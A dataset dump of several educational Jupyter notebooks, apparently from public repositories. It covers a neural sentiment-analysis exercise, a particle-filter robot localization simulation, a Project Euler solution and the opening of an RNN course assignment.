call to `update_input_layer` \n>* Use `self`'s `layer_1` instead of a local `layer_1` object.\n>* Much like you did in `train`, you will need to pre-process the `review` so you can work with word indices, then update `layer_1` by adding weights for the indices used in the review.",
"_____no_output_____"
]
],
[
[
"# TODO: -Copy the SentimentNetwork class from Project 4 lesson\n# -Modify it according to the above instructions ",
"_____no_output_____"
]
],
[
[
"Run the following cell to recreate the network and train it once again.",
"_____no_output_____"
]
],
[
[
"mlp = SentimentNetwork(reviews[:-1000],labels[:-1000], learning_rate=0.1)\nmlp.train(reviews[:-1000],labels[:-1000])",
"_____no_output_____"
]
],
[
[
"That should have trained much better than the earlier attempts. Run the following cell to test your model with 1000 predictions.",
"_____no_output_____"
]
],
[
[
"mlp.test(reviews[-1000:],labels[-1000:])",
"_____no_output_____"
]
],
[
[
"# End of Project 5. \n## Watch the next video to see Andrew's solution, then continue on to the next lesson.\n# Further Noise Reduction<a id='lesson_6'></a>",
"_____no_output_____"
]
],
[
[
"Image(filename='sentiment_network_sparse_2.png')",
"_____no_output_____"
],
[
"# words most frequently seen in a review with a \"POSITIVE\" label\npos_neg_ratios.most_common()",
"_____no_output_____"
],
[
"# words most frequently seen in a review with a \"NEGATIVE\" label\nlist(reversed(pos_neg_ratios.most_common()))[0:30]",
"_____no_output_____"
],
[
"from bokeh.models import ColumnDataSource, LabelSet\nfrom bokeh.plotting import figure, show, output_file\nfrom bokeh.io import output_notebook\noutput_notebook()",
"_____no_output_____"
],
[
"hist, edges = np.histogram(list(map(lambda x:x[1],pos_neg_ratios.most_common())), density=True, bins=100, normed=True)\n\np = figure(tools=\"pan,wheel_zoom,reset,save\",\n toolbar_location=\"above\",\n title=\"Word Positive/Negative Affinity Distribution\")\np.quad(top=hist, bottom=0, left=edges[:-1], right=edges[1:], line_color=\"#555555\")\nshow(p)",
"_____no_output_____"
],
[
"frequency_frequency = Counter()\n\nfor word, cnt in total_counts.most_common():\n frequency_frequency[cnt] += 1",
"_____no_output_____"
],
[
"hist, edges = np.histogram(list(map(lambda x:x[1],frequency_frequency.most_common())), density=True, bins=100, normed=True)\n\np = figure(tools=\"pan,wheel_zoom,reset,save\",\n toolbar_location=\"above\",\n title=\"The frequency distribution of the words in our corpus\")\np.quad(top=hist, bottom=0, left=edges[:-1], right=edges[1:], line_color=\"#555555\")\nshow(p)",
"_____no_output_____"
]
],
[
[
"# Project 6: Reducing Noise by Strategically Reducing the Vocabulary<a id='project_6'></a>\n\n**TODO:** Improve `SentimentNetwork`'s performance by reducing more noise in the vocabulary. Specifically, do the following:\n* Copy the `SentimentNetwork` class from the previous project into the following cell.\n* Modify `pre_process_data`:\n>* Add two additional parameters: `min_count` and `polarity_cutoff`\n>* Calculate the positive-to-negative ratios of words used in the reviews. (You can use code you've written elsewhere in the notebook, but we are moving it into the class like we did with other helper code earlier.)\n>* Andrew's solution only calculates a postive-to-negative ratio for words that occur at least 50 times. This keeps the network from attributing too much sentiment to rarer words. You can choose to add this to your solution if you would like. \n>* Change so words are only added to the vocabulary if they occur in the vocabulary more than `min_count` times.\n>* Change so words are only added to the vocabulary if the absolute value of their postive-to-negative ratio is at least `polarity_cutoff`\n* Modify `__init__`:\n>* Add the same two parameters (`min_count` and `polarity_cutoff`) and use them when you call `pre_process_data`",
"_____no_output_____"
]
],
[
[
"# TODO: -Copy the SentimentNetwork class from Project 5 lesson\n# -Modify it according to the above instructions ",
"_____no_output_____"
]
],
[
[
"Run the following cell to train your network with a small polarity cutoff.",
"_____no_output_____"
]
],
[
[
"mlp = SentimentNetwork(reviews[:-1000],labels[:-1000],min_count=20,polarity_cutoff=0.05,learning_rate=0.01)\nmlp.train(reviews[:-1000],labels[:-1000])",
"_____no_output_____"
]
],
[
[
"And run the following cell to test it's performance. It should be ",
"_____no_output_____"
]
],
[
[
"mlp.test(reviews[-1000:],labels[-1000:])",
"_____no_output_____"
]
],
[
[
"Run the following cell to train your network with a much larger polarity cutoff.",
"_____no_output_____"
]
],
[
[
"mlp = SentimentNetwork(reviews[:-1000],labels[:-1000],min_count=20,polarity_cutoff=0.8,learning_rate=0.01)\nmlp.train(reviews[:-1000],labels[:-1000])",
"_____no_output_____"
]
],
[
[
"And run the following cell to test it's performance.",
"_____no_output_____"
]
],
[
[
"mlp.test(reviews[-1000:],labels[-1000:])",
"_____no_output_____"
]
],
[
[
"# End of Project 6. \n## Watch the next video to see Andrew's solution, then continue on to the next lesson.",
"_____no_output_____"
],
[
"# Analysis: What's Going on in the Weights?<a id='lesson_7'></a>",
"_____no_output_____"
]
],
[
[
"mlp_full = SentimentNetwork(reviews[:-1000],labels[:-1000],min_count=0,polarity_cutoff=0,learning_rate=0.01)",
"_____no_output_____"
],
[
"mlp_full.train(reviews[:-1000],labels[:-1000])",
"_____no_output_____"
],
[
"Image(filename='sentiment_network_sparse.png')",
"_____no_output_____"
],
[
"def get_most_similar_words(focus = \"horrible\"):\n most_similar = Counter()\n\n for word in mlp_full.word2index.keys():\n most_similar[word] = np.dot(mlp_full.weights_0_1[mlp_full.word2index[word]],mlp_full.weights_0_1[mlp_full.word2index[focus]])\n \n return most_similar.most_common()",
"_____no_output_____"
],
[
"get_most_similar_words(\"excellent\")",
"_____no_output_____"
],
[
"get_most_similar_words(\"terrible\")",
"_____no_output_____"
],
[
"import matplotlib.colors as colors\n\nwords_to_visualize = list()\nfor word, ratio in pos_neg_ratios.most_common(500):\n if(word in mlp_full.word2index.keys()):\n words_to_visualize.append(word)\n \nfor word, ratio in list(reversed(pos_neg_ratios.most_common()))[0:500]:\n if(word in mlp_full.word2index.keys()):\n words_to_visualize.append(word)",
"_____no_output_____"
],
[
"pos = 0\nneg = 0\n\ncolors_list = list()\nvectors_list = list()\nfor word in words_to_visualize:\n if word in pos_neg_ratios.keys():\n vectors_list.append(mlp_full.weights_0_1[mlp_full.word2index[word]])\n if(pos_neg_ratios[word] > 0):\n pos+=1\n colors_list.append(\"#00ff00\")\n else:\n neg+=1\n colors_list.append(\"#000000\")",
"_____no_output_____"
],
[
"from sklearn.manifold import TSNE\ntsne = TSNE(n_components=2, random_state=0)\nwords_top_ted_tsne = tsne.fit_transform(vectors_list)",
"_____no_output_____"
],
[
"p = figure(tools=\"pan,wheel_zoom,reset,save\",\n toolbar_location=\"above\",\n title=\"vector T-SNE for most polarized words\")\n\nsource = ColumnDataSource(data=dict(x1=words_top_ted_tsne[:,0],\n x2=words_top_ted_tsne[:,1],\n names=words_to_visualize,\n color=colors_list))\n\np.scatter(x=\"x1\", y=\"x2\", size=8, source=source, fill_color=\"color\")\n\nword_labels = LabelSet(x=\"x1\", y=\"x2\", text=\"names\", y_offset=6,\n text_font_size=\"8pt\", text_color=\"#555555\",\n source=source, text_align='center')\np.add_layout(word_labels)\n\nshow(p)\n\n# green indicates positive words, black indicates negative words",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e7090fe50995a47ec6ceb4e4feb09bc9047cecc9 | 527,795 | ipynb | Jupyter Notebook | monte_carlo_localization/5.global_localization.ipynb | ryuichiueda/probrobo_practice | 4d1d49ef4f01a2b77e61fbdbeed6001a8a25d7c3 | [
"MIT"
] | 51 | 2017-04-08T13:40:19.000Z | 2021-01-12T06:57:57.000Z | monte_carlo_localization/5.global_localization.ipynb | ryuichiueda/probrobo_practice | 4d1d49ef4f01a2b77e61fbdbeed6001a8a25d7c3 | [
"MIT"
] | null | null | null | monte_carlo_localization/5.global_localization.ipynb | ryuichiueda/probrobo_practice | 4d1d49ef4f01a2b77e61fbdbeed6001a8a25d7c3 | [
"MIT"
] | 11 | 2017-05-01T09:35:47.000Z | 2020-04-24T07:36:34.000Z | 869.514003 | 37,394 | 0.936074 | [
[
[
"# Monte Carlo Localization\n\n千葉工業大学 上田 隆一\n\n(c) 2017 Ryuichi Ueda\n\nThis software is released under the MIT License, see LICENSE.\n\n## はじめに\n\nこのコードは、1.monte_calro_localization.ipynb のコードを大域的自己位置推定に用いる例です。\n\n## コード\n\nしばらくは 1.monte_calro_localization.ipynb と同じです。",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport numpy as np\nfrom copy import copy\nimport math, random\nimport matplotlib.pyplot as plt # for plotting data\nfrom matplotlib.patches import Ellipse # for drawing\n\nclass Gaussian2D:\n # 共分散行列、中心の座標を属性に持つ\n def __init__(self,sigma_x = 1.0, sigma_y = 1.0, cov_xy = 0.0,mu_x = 0.0, mu_y = 0.0):\n self.cov = np.array([[sigma_x**2,cov_xy],[cov_xy,sigma_y**2]])\n self.mean = np.array([mu_x,mu_y]).T\n \n # ガウス分布の移動\n def shift(self,delta,angle):\n ca = math.cos(angle)\n sa = math.sin(angle)\n rot = np.array([[ca,sa],[-sa,ca]])\n \n self.cov = rot.dot(self.cov).dot(rot.T)\n self.mean = self.mean + delta\n \n # 密度の算出\n def value(self, pos):\n delta = pos - self.mean\n numerator = math.exp(-0.5 * (delta.T).dot(np.linalg.inv(self.cov)).dot(delta))\n denominator = 2 * math.pi * math.sqrt(np.linalg.det(self.cov))\n return numerator / denominator\n\nclass Landmarks:\n def __init__(self,array):\n self.positions = array\n \n def draw(self):\n xs = [ e[0] for e in self.positions]\n ys = [ e[1] for e in self.positions]\n plt.scatter(xs,ys,s=300,marker=\"*\",label=\"landmarks\",color=\"orange\")\n \n\nclass Observation:\n def __init__(self,robot_pos, landmark,lid):\n # センサの有効範囲の設定\n self.sensor_max_range = 1.0\n self.sensor_min_range = 0.1\n self.sensor_max_angle = math.pi / 2\n self.sensor_min_angle = - math.pi /2 \n \n # ランドマークのIDを保存しておく属性。ランドマークがセンサの有効範囲にないとNoneのまま\n self.lid = None\n \n # 真の位置の情報をセットする。ロボットの真の姿勢はシミュレーション用でロボットは知らないという前提。\n # 真のランドマークの位置は、ロボットは知っているのでこのインスタンスの属性として保存します。\n rx,ry,rt = robot_pos\n self.true_lx,self.true_ly = landmark\n \n # ロボットからランドマークまでの距離の真値を算出\n distance = math.sqrt((rx-self.true_lx)**2 + (ry-self.true_ly)**2)\n if distance > self.sensor_max_range or distance < self.sensor_min_range:\n return\n \n # ロボットからランドマークがどの方向に見えるか真値を算出\n direction = math.atan2(self.true_ly-ry, self.true_lx-rx) - rt\n if direction > math.pi: direction -= 2*math.pi\n if direction < -math.pi: direction += 2*math.pi \n if direction > self.sensor_max_angle or direction < self.sensor_min_angle:\n return\n \n # 真値に混入する雑音の大きさ(標準偏差)を設定\n sigma_distance = distance * 0.1 # 距離に対して10%の標準偏差\n sigma_direction = math.pi * 3 / 180 # ランドマークの方向に対して3degの標準偏差\n \n # 雑音を混ぜてセンサの値とする\n self.distance = random.gauss(distance, sigma_distance) \n self.direction = random.gauss(direction, sigma_direction)\n \n # ロボット座標系での共分散行列を作っておく。あとで尤度を計算するときに使用\n # x方向が奥行きで、sigma_distanceを標準偏差に設定。y方向がロボットから見て横方向の誤差で、距離*sin(3[deg])となる。\n self.error_ellipse = Gaussian2D(sigma_x = sigma_distance, sigma_y = self.distance * math.sin(sigma_direction) , cov_xy = 0.0)\n\n self.lid = lid\n \n # 尤度の計算(遅い実装です。)\n # パーティクルの姿勢とランドマークの計測値からランドマークの位置を推定し、その位置に誤差楕円を置き、\n # ランドマークの真の位置が誤差楕円からどれだけ外れているかを確率密度関数の密度として返します。\n # この計算はもっと簡略化できますが、描画の関係でこういう手順を踏んでいます。\n # 簡略な方法: パーティクルの姿勢とランドマークの真の位置から、想定されるランドマークの距離・方向を算出し、\n # 実際の距離・方向とそれぞれ比較する方法。距離の誤差の傾向、方向の誤差の傾向をそれぞれ1次元のガウス分布で表現し、\n # それぞれを独立して計算して尤度を算出し、掛け算する。\n def likelihood(self,particle_pos): \n # パーティクルの姿勢と、このインスタンスに保存されているセンサの値から、ランドマークの位置を求める\n rx, ry, rt = particle_pos\n proposed_lx = rx + self.distance * math.cos(rt + self.direction)\n proposed_ly = ry + self.distance * math.sin(rt + self.direction)\n \n # このインスタンスに保存されている共分散行列を、計算されたランドマークの位置に移し、パーティクルの向きに合わせて共分散行列を回転\n e = copy(self.error_ellipse)\n e.shift(np.array([proposed_lx, proposed_ly]).T, rt + self.direction)\n\n # そのままガウス分布の計算式から密度(尤度)を返します。\n return e.value(np.array([self.true_lx,self.true_ly]).T)\n \n # 描画用\n def ellipse(self,robot_pos):\n rx, ry, rt = robot_pos[0], robot_pos[1], robot_pos[2]\n proposed_lx = rx + self.distance * math.cos(rt + self.direction)\n proposed_ly = ry + self.distance * math.sin(rt + self.direction)\n \n e = copy(self.error_ellipse)\n e.shift(np.array([proposed_lx, proposed_ly]).T, rt + self.direction)\n \n # 固有ベクトルを二つ求めて、それぞれの大きさを求めて楕円を作り、幅を計算した方の固有ベクトルの向きに楕円を回転すると誤差楕円になります。\n eigen = np.linalg.eig(e.cov)\n \n v1 = eigen[0][0] * eigen[1][0]\n v2 = eigen[0][1] * eigen[1][1]\n v1_direction = math.atan2(v1[1],v1[0])\n \n elli = Ellipse([proposed_lx, proposed_ly],width=math.sqrt(np.linalg.norm(v1)),height=math.sqrt(np.linalg.norm(v2)),angle=v1_direction/3.14*180)\n elli.set_alpha(0.2)\n \n return elli\n \n # 描画用\n def draw(self,sp,robot_pos):\n sp.add_artist(self.ellipse(robot_pos)) \n\nactual_landmarks = Landmarks(np.array([[-0.5,0.0],[0.5,0.0],[0.0,0.5]]))\nactual_landmarks.draw()",
"_____no_output_____"
]
],
[
[
"### パーティクルのクラスとパーティクルフィルタのクラス\n\nロボットの初期姿勢は分からないという前提なので、パーティクルはロボットが存在しうる範囲にランダムに配置する。",
"_____no_output_____"
]
],
[
[
"# パーティクルのクラス。単なる構造体\nclass Particle:\n def __init__(self,x,y,t,w):\n self.pos = np.array([x,y,t])\n self.w = w\n\n# パーティクルフィルタのクラス\nclass ParticleFilter:\n # この実装ではコンストラクタはパーティクルの個数だけを引数にとる\n def __init__(self,num):\n # 空のパーティクルのリストを作って一つずつ追加していく(実装がベタ)\n self.particles = []\n for i in range(num):\n x = random.uniform(-1.0,1.0)\n y = random.uniform(-0.5,1.5)\n t = random.uniform(-math.pi,math.pi)\n self.particles.append(Particle(x,y,t,1.0/num)) # 初期位置がわからないという前提なのでパーティクルをランダムに置く\n \n # ロボットが動いたときにパーティクルを動かすためのメソッド\n # 引数の「motion」はメソッドで、ロボットの移動を再現するためのもの。\n # ロボットは自身がどのように動作するとどう姿勢が変化するかを知っており、このメソッドがその知識となる。\n def moveParticles(self,fw,rot,motion):\n self.resampling() # このメソッドについては後述\n \n # パーティクルごとに移動した後の姿勢を計算し、姿勢を更新する。\n for p in self.particles:\n after = motion(p.pos,fw,rot) \n p.pos = after\n \n # リサンプリングのためのメソッド。\n # リサンプリングは、重みがごく少数のパーティクルに偏ることを防ぐための措置で、近似していない理論上の数式では出現しない。\n def resampling(self):\n num = len(self.particles) # numはパーティクルの個数\n ws = [e.w for e in self.particles] # 重みのリストを作る\n \n print(sum(ws))\n if sum(ws) < 1e-100: #重みの和がゼロに丸め込まれるとサンプリングできなくなるので小さな数を足しておく\n ws = [e + 1e-100 for e in ws]\n \n ps = random.choices(self.particles, weights=ws, k=num) # パーティクルのリストから、weightsのリストの重みに比例した確率で、num個選ぶ\n self.particles = [Particle(*e.pos,1.0/num) for e in ps] # 選んだリストからパーティクルを取り出し、パーティクルの姿勢から重み1/numの新しいパーティクルを作成\n\n # 描画用\n def draw(self,c=\"blue\",lbl=\"particles\"):\n xs = [p.pos[0] for p in self.particles]\n ys = [p.pos[1] for p in self.particles]\n vxs = [math.cos(p.pos[2]) for p in self.particles]\n vys = [math.sin(p.pos[2]) for p in self.particles]\n plt.quiver(xs,ys,vxs,vys,color=c,label=lbl,alpha=0.7)",
"_____no_output_____"
]
],
[
[
"### ロボットを表現するクラス\n\nロボットはランドマークを観測して1ステップ進んで・・・を繰り返します。",
"_____no_output_____"
]
],
[
[
"class Robot:\n def __init__(self,x,y,rad):\n random.seed()\n \n # actual_poses: ロボットの姿勢の真値を1ステップごとに記録したもの\n # (ロボットのクラス内にいるけどロボットはこの情報を使えない)\n self.actual_poses = [np.array([x,y,rad])]\n \n # パーティクルフィルタの準備(パーティクル数30個)\n self.pf = ParticleFilter(30)\n \n # ロボットの動作をシミュレートするメソッド。シミュレーションだけでなく、ロボットがパーティクルを移動するときにも用いる。\n # つまり実機に実装する場合もこのメソッドが必要となる。雑音の度合いは事前に計測するか、\n # ざっくり決めてフィルタのロバスト性に頼る。\n def motion(self, pos, fw, rot):\n # fwだけ前進してその後rotだけ回転。雑音を混入させる\n actual_fw = random.gauss(fw,fw/10) #進む距離に対して標準偏差10%の雑音を混入\n dir_error = random.gauss(0.0, math.pi / 180.0 * 3.0) # 前進方向がヨレる雑音を標準偏差3[deg]で混入\n \n px, py, pt = pos\n # 移動後の位置を算出\n x = px + actual_fw * math.cos(pt + dir_error)\n y = py + actual_fw * math.sin(pt + dir_error)\n # 雑音込みの回転各を算出。rotに対して標準偏差10%の雑音を混ぜる\n actual_rot = random.gauss(rot,rot/10)\n t = pt + dir_error + actual_rot # さらにヨレの分の角度を足す\n \n return np.array([x,y,t])\n \n # ロボットが動くときに呼び出すメソッド。ロボットの位置の更新とパーティクルの位置の更新\n def move(self,fw,rot):\n self.actual_poses.append(self.motion(self.actual_poses[-1],fw,rot))\n self.pf.moveParticles(fw,rot,self.motion)\n \n # ロボットがランドマーク観測するときに呼び出すメソッド\n def observation(self,landmarks):\n obss = []\n for i,landmark in enumerate(landmarks.positions): # 3つあるランドマークを1つずつ観測\n obss.append(Observation(self.actual_poses[-1],landmark,i))\n obss = list(filter(lambda e : e.lid != None, obss)) # 観測データのないものを除去\n \n # 重みに尤度をかける\n for obs in obss:\n for p in self.pf.particles:\n p.w *= obs.likelihood(p.pos)\n \n # 描画用に観測のリストを返す\n return obss\n \n # 描画用\n def draw(self,sp,observations):\n for obs in observations:\n for p in self.pf.particles:\n obs.draw(sp,p.pos)\n \n self.pf.draw()\n \n xs = [e[0] for e in self.actual_poses]\n ys = [e[1] for e in self.actual_poses]\n vxs = [math.cos(e[2]) for e in self.actual_poses]\n vys = [math.sin(e[2]) for e in self.actual_poses]\n plt.quiver(xs,ys,vxs,vys,color=\"red\",label=\"actual robot motion\")",
"_____no_output_____"
]
],
[
[
"## 描画用の関数\n\n説明は割愛。",
"_____no_output_____"
]
],
[
[
"def draw(i,observations):\n fig = plt.figure(i,figsize=(8, 8))\n sp = fig.add_subplot(111, aspect='equal')\n sp.set_xlim(-1.0,1.0)\n sp.set_ylim(-0.5,1.5)\n\n robot.draw(sp,observations)\n \n actual_landmarks.draw()\n\n plt.legend()",
"_____no_output_____"
]
],
[
[
"## シミュレーションの実行\n\n図の説明: \n\n* 赤の矢印: 真の姿勢\n* 星: ランドマークの位置\n* 青の矢印: パーティクルの姿勢\n* 楕円: ランドマークの観測値と各パーティクルの姿勢からランドマークの位置を計算したものと、その位置の曖昧さを表す共分散行列",
"_____no_output_____"
]
],
[
[
"robot = Robot(0,0,0) # ロボットを原点に\n\n# 観測、描画、移動の繰り返し\nfor i in range(0,18):\n obss = robot.observation(actual_landmarks)\n draw(i,obss)\n robot.move(0.2,math.pi / 180.0 * 20)",
"3.4857462624018935e-94\n1.7035402799540005e-178\n0.0\n21.604406200433147\n0.9999999999999999\n44.479321225433516\n6.005893681034994\n21.411558268966374\n45.62303779568465\n2.340642845412178\n7.259398556265846\n20.99013001681471\n6.615595607270375e-27\n1.667989573024536e-39\n4.345534966955492e-79\n1.2252985626051819e-211\n2.375769226589642e-25\n1.0042934512227948e-49\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
e70919230e85ce39dfca101635d597652cf5002b | 4,221 | ipynb | Jupyter Notebook | 01_Multiples_of_3_and_5.ipynb | bundickm/Daily-Project-Euler | 50d7462aa4b49735c744b941d558312d2f27bc87 | [
"MIT"
] | null | null | null | 01_Multiples_of_3_and_5.ipynb | bundickm/Daily-Project-Euler | 50d7462aa4b49735c744b941d558312d2f27bc87 | [
"MIT"
] | null | null | null | 01_Multiples_of_3_and_5.ipynb | bundickm/Daily-Project-Euler | 50d7462aa4b49735c744b941d558312d2f27bc87 | [
"MIT"
] | null | null | null | 26.38125 | 248 | 0.446577 | [
[
[
"<a href=\"https://colab.research.google.com/github/bundickm/Daily-Project-Euler/blob/main/01_Multiples_of_3_and_5.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"If we list all the natural numbers below 10 that are multiples of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23. Find the sum of all the multiples of 3 or 5 below 1000.",
"_____no_output_____"
]
],
[
[
"#initial solution\ndef sum_of_multiples_3_5(n):\n total = 0\n for i in range(1, n):\n if ((i%3==0) | (i%5==0)):\n total+=i\n return total\n\nsum_of_multiples_3_5(1000)",
"_____no_output_____"
],
[
"#refactored as a list comprehension\ndef sum_of_multiples_3_5(n):\n return sum([i for i in range(1, n) \n if ((i%3==0) | (i%5==0))])\n\nsum_of_multiples_3_5(1000)",
"_____no_output_____"
],
[
"# Method with math instead of loops\ndef sum_of_multi(target, multiple):\n # sum of all multiples up to and including target\n x = target // multiple\n return multiple*(x*(x+1))//2\n\ndef sum_of_multiples_3_5(target):\n # Adjust target since the problem is non-inclusive\n target = target-1\n # Return the sum of multiples of 3 and 5\n # Remove dupes by subtracting all multiples of\n # least common multiplier, 15\n return (sum_of_multi(target, 3) + \n sum_of_multi(target, 5) - \n sum_of_multi(target, 15))\n\nsum_of_multiples_3_5(1000)",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
e7092160ad1c4a483e70d7f299a1b7c657b5d85a | 83,460 | ipynb | Jupyter Notebook | 4. Sequence Models/Week 1/Building a Recurrent Neural Network - Step by Step/Building a Recurrent Neural Network - Step by Step - v3.ipynb | adityajn105/Coursera-Deep-Learning-Specialization | 26cf7da29b2f1cb32799e045cc9cdfab99ad0757 | [
"Unlicense"
] | 2 | 2020-08-21T03:59:01.000Z | 2020-09-05T13:13:19.000Z | 4. Sequence Models/Week 1/Building a Recurrent Neural Network - Step by Step/Building a Recurrent Neural Network - Step by Step - v3.ipynb | adityajn105/Coursera-Deep-Learning-Specialization | 26cf7da29b2f1cb32799e045cc9cdfab99ad0757 | [
"Unlicense"
] | null | null | null | 4. Sequence Models/Week 1/Building a Recurrent Neural Network - Step by Step/Building a Recurrent Neural Network - Step by Step - v3.ipynb | adityajn105/Coursera-Deep-Learning-Specialization | 26cf7da29b2f1cb32799e045cc9cdfab99ad0757 | [
"Unlicense"
] | null | null | null | 40.416465 | 1,948 | 0.467589 | [
[
[
"# Building your Recurrent Neural Network - Step by Step\n\nWelcome to Course 5's first assignment! In this assignment, you will implement your first Recurrent Neural Network in numpy.\n\nRecurrent Neural Networks (RNN) are very effective for Natural Language Processing and other sequence tasks because they have \"memory\". They can read inputs $x^{\\langle t \\rangle}$ (such as words) one at a time, and remember some information/context through the hidden layer activations that get passed from one time-step to the next. This allows a uni-directional RNN to take information from the past to process later inputs. A bidirection RNN can take context from both the past and the future. \n\n**Notation**:\n- Superscript $[l]$ denotes an object associated with the $l^{th}$ layer. \n - Example: $a^{[4]}$ is the $4^{th}$ layer activation. $W^{[5]}$ and $b^{[5]}$ are the $5^{th}$ layer parameters.\n\n- Superscript $(i)$ denotes an object associated with the $i^{th}$ example. \n - Example: $x^{(i)}$ is the $i^{th}$ training example input.\n\n- Superscript $\\langle t \\rangle$ denotes an object at the $t^{th}$ time-step. \n - Example: $x^{\\langle t \\rangle}$ is the input x at the $t^{th}$ time-step. $x^{(i)\\langle t \\rangle}$ is the input at the $t^{th}$ timestep of example $i$.\n \n- Lowerscript $i$ denotes the $i^{th}$ entry of a vector.\n - Example: $a^{[l]}_i$ denotes the $i^{th}$ entry of the activations in layer $l$.\n\nWe assume that you are already familiar with `numpy` and/or have completed the previous courses of the specialization. Let's get started!",
"_____no_output_____"
],
[
"Let's first import all the packages that you will need during this assignment.",
"_____no_output_____"
]
],
[
[
"import numpy as np\nfrom rnn_utils import *",
"_____no_output_____"
]
],
[
[
"## 1 - Forward propagation for the basic Recurrent Neural Network\n\nLater this week, you will generate music using an RNN. The basic RNN that you will implement has the structure below. In this example, $T_x = T_y$. ",
"_____no_output_____"
],
[
"<img src=\"images/RNN.png\" style=\"width:500;height:300px;\">\n<caption><center> **Figure 1**: Basic RNN model </center></caption>",
"_____no_output_____"
],
[
"Here's how you can implement an RNN: \n\n**Steps**:\n1. Implement the calculations needed for one time-step of the RNN.\n2. Implement a loop over $T_x$ time-steps in order to process all the inputs, one at a time. \n\nLet's go!\n\n## 1.1 - RNN cell\n\nA Recurrent neural network can be seen as the repetition of a single cell. You are first going to implement the computations for a single time-step. The following figure describes the operations for a single time-step of an RNN cell. \n\n<img src=\"images/rnn_step_forward.png\" style=\"width:700px;height:300px;\">\n<caption><center> **Figure 2**: Basic RNN cell. Takes as input $x^{\\langle t \\rangle}$ (current input) and $a^{\\langle t - 1\\rangle}$ (previous hidden state containing information from the past), and outputs $a^{\\langle t \\rangle}$ which is given to the next RNN cell and also used to predict $y^{\\langle t \\rangle}$ </center></caption>\n\n**Exercise**: Implement the RNN-cell described in Figure (2).\n\n**Instructions**:\n1. Compute the hidden state with tanh activation: $a^{\\langle t \\rangle} = \\tanh(W_{aa} a^{\\langle t-1 \\rangle} + W_{ax} x^{\\langle t \\rangle} + b_a)$.\n2. Using your new hidden state $a^{\\langle t \\rangle}$, compute the prediction $\\hat{y}^{\\langle t \\rangle} = softmax(W_{ya} a^{\\langle t \\rangle} + b_y)$. We provided you a function: `softmax`.\n3. Store $(a^{\\langle t \\rangle}, a^{\\langle t-1 \\rangle}, x^{\\langle t \\rangle}, parameters)$ in cache\n4. Return $a^{\\langle t \\rangle}$ , $y^{\\langle t \\rangle}$ and cache\n\nWe will vectorize over $m$ examples. Thus, $x^{\\langle t \\rangle}$ will have dimension $(n_x,m)$, and $a^{\\langle t \\rangle}$ will have dimension $(n_a,m)$. ",
"_____no_output_____"
]
],
[
[
